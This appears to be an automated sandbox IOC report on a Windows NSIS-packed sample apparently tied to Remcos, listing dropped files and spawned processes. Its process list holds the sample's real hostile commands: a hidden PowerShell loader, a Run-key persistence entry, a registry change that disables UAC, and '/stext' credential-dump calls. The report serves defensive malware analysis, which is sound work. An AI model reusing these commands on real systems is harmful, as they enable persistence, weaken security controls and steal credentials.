IOC Report
IT01879020517_uGIim_xml#U00b7pdf.exe

loading gif

Files

File Path
Type
Category
Malicious
IT01879020517_uGIim_xml#U00b7pdf.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
modified
malicious
C:\Users\user\AppData\Local\Temp\Loupen.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\Loupen.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\BgImage.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\UserInfo.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\nsDialogs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und
ASCII text, with very long lines (65536), with no line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xb598f686, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_763cc06ddd191e0b2a3c26e6eec71deecc9f88_f469684b_67036ab9-a9a5-4c9a-8111-79a84e4dcabe\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_eeb76350ac29bb3b486937f9169f68096e924e2_f469684b_5f7c8348-3926-4c3f-a256-55d37fae53f0\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E5A.tmp.dmp
Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:38 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8129.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8169.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6BD.tmp.dmp
Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:56 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8C2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8E2.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2ol2ewj.pcu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xy2loq3c.gjs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv7B7B.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xa18356d8, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Farvebaandsomskifteren.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Montanes176.opt
Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Wafery.unt
data
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\barsel.pul
data
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\migraines.sla
PGP symmetric key encrypted data - Plaintext or unencrypted data
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tegnmssig.bra
data
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tradionsbevarende.unp
data
dropped
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Neuraxial.Aca
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 25 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe
"C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Enmeshed=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und';$Bia=$Enmeshed.SubString(70893,3);.$Bia($Enmeshed)"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)"
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)"
malicious
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
malicious
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\usqirflqwomfxiavdrsyibgadyvbmltib"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1